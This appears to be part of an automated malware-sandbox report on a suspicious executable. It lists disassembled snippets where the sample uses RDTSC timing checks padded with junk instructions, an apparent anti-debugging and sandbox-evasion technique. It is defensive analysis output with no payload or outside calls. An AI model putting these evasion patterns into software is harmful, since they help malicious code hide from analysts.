Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8AB73E second address: 8AB74A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5F64D1DAB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8AB74A second address: 8AB75B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F5F64D1DF16h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92A972 second address: 92A978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92A978 second address: 92A97C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92A97C second address: 92A986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92AAF0 second address: 92AAF5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92B1D6 second address: 92B1DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92B357 second address: 92B365 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F5F64D1DF1Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92B365 second address: 92B385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F5F64D1DABEh 0x0000000b jnl 00007F5F64D1DABCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92BBB3 second address: 92BBCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push ebx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d pushad 0x0000000e jng 00007F5F64D1DF16h 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92F358 second address: 92F369 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92F369 second address: 92F371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92F371 second address: 92F38D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 89C80D second address: 89C81E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F5F64D1DF1Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 89C81E second address: 89C823 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 89C823 second address: 89C829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 89C829 second address: 89C833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 932271 second address: 932278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 932278 second address: 93229B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5F64D1DAB6h 0x0000000a pop eax 0x0000000b jne 00007F5F64D1DAC2h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93229B second address: 9322A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9322A2 second address: 9322C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DAC3h 0x00000008 jnl 00007F5F64D1DAB6h 0x0000000e jc 00007F5F64D1DAB6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9322C9 second address: 9322DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9339FD second address: 933A18 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5F64D1DAC6h 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 933A18 second address: 933A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jc 00007F5F64D1DF45h 0x0000000d js 00007F5F64D1DF22h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 935CEA second address: 935CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 935CF0 second address: 935CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93AA12 second address: 93AA1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93AA1D second address: 93AA21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93AB53 second address: 93AB7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnc 00007F5F64D1DAB6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5F64D1DAC9h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93AB7D second address: 93AB91 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F5F64D1DF1Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93ACDC second address: 93ACE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93ACE0 second address: 93ACE8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93ACE8 second address: 93AD1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 jnl 00007F5F64D1DAB6h 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5F64D1DABBh 0x00000019 jmp 00007F5F64D1DAC3h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93AD1A second address: 93AD4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DF25h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F5F64D1DF22h 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93B140 second address: 93B14E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5F64D1DABAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93FC95 second address: 93FC99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93FC99 second address: 93FCA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93FCA3 second address: 93FCA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93FE2D second address: 93FE35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93FE35 second address: 93FE39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93FFA6 second address: 93FFAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93FFAC second address: 93FFB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93FFB0 second address: 93FFB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7DF3 second address: 8E7DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7DF8 second address: 8E7E77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F5F64D1DAB8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 push edi 0x00000027 pop ecx 0x00000028 clc 0x00000029 mov ebx, dword ptr [ebp+1247BD6Fh] 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007F5F64D1DAB8h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 mov edi, dword ptr [ebp+122D2BB3h] 0x0000004f mov dx, 9B71h 0x00000053 add eax, ebx 0x00000055 push edx 0x00000056 adc ch, FFFFFF80h 0x00000059 pop ecx 0x0000005a nop 0x0000005b push edi 0x0000005c pushad 0x0000005d pushad 0x0000005e popad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7E77 second address: 8E7E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7E84 second address: 8E7E8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F5F64D1DAB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94433A second address: 944342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9439D1 second address: 9439E3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5F64D1DAB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9439E3 second address: 9439E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9439E7 second address: 9439EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9439EF second address: 943A33 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 jmp 00007F5F64D1DF26h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007F5F64D1DF2Ch 0x00000015 jmp 00007F5F64D1DF26h 0x0000001a jns 00007F5F64D1DF18h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 943A33 second address: 943A39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 943A39 second address: 943A3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 943A3D second address: 943A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 943A47 second address: 943A4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 943BA9 second address: 943BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 943BAD second address: 943BB9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 943BB9 second address: 943BD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5F64D1DABCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 943BD3 second address: 943BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94404C second address: 944066 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F5F64D1DABEh 0x0000000e jl 00007F5F64D1DAB6h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 944066 second address: 94406C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94406C second address: 944070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94C282 second address: 94C286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94C286 second address: 94C29B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DABEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94C29B second address: 94C2B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5F64D1DF25h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94C2B8 second address: 94C2BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94C2BE second address: 94C308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F5F64D1DF24h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F5F64D1DF27h 0x00000015 jmp 00007F5F64D1DF23h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94A49C second address: 94A4A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94A4A0 second address: 94A4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5F64D1DF16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94A7A1 second address: 94A7A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94A7A5 second address: 94A7A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94AA63 second address: 94AA72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007F5F64D1DAB6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94AA72 second address: 94AA78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94AD1C second address: 94AD48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5F64D1DABBh 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F5F64D1DAC9h 0x00000013 jmp 00007F5F64D1DABDh 0x00000018 jnl 00007F5F64D1DAB6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94AD48 second address: 94AD4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94B38B second address: 94B3AF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5F64D1DAB6h 0x00000008 jmp 00007F5F64D1DAC2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jbe 00007F5F64D1DAB6h 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94B3AF second address: 94B3B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94B3B6 second address: 94B3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007F5F64D1DAC9h 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007F5F64D1DAB8h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94B3E6 second address: 94B406 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DF27h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94B995 second address: 94B9AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94BF78 second address: 94BFA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF20h 0x00000007 jmp 00007F5F64D1DF1Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94BFA0 second address: 94BFA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94BFA6 second address: 94BFC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d jns 00007F5F64D1DF1Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94BFC1 second address: 94BFEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC9h 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F5F64D1DAB6h 0x0000000f jp 00007F5F64D1DAB6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 954A08 second address: 954A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 953D4B second address: 953D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 953EF1 second address: 953EF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 954451 second address: 95446D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b jo 00007F5F64D1DAB8h 0x00000011 push esi 0x00000012 pop esi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9546FC second address: 95472E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DF27h 0x00000009 jmp 00007F5F64D1DF27h 0x0000000e rdtsc
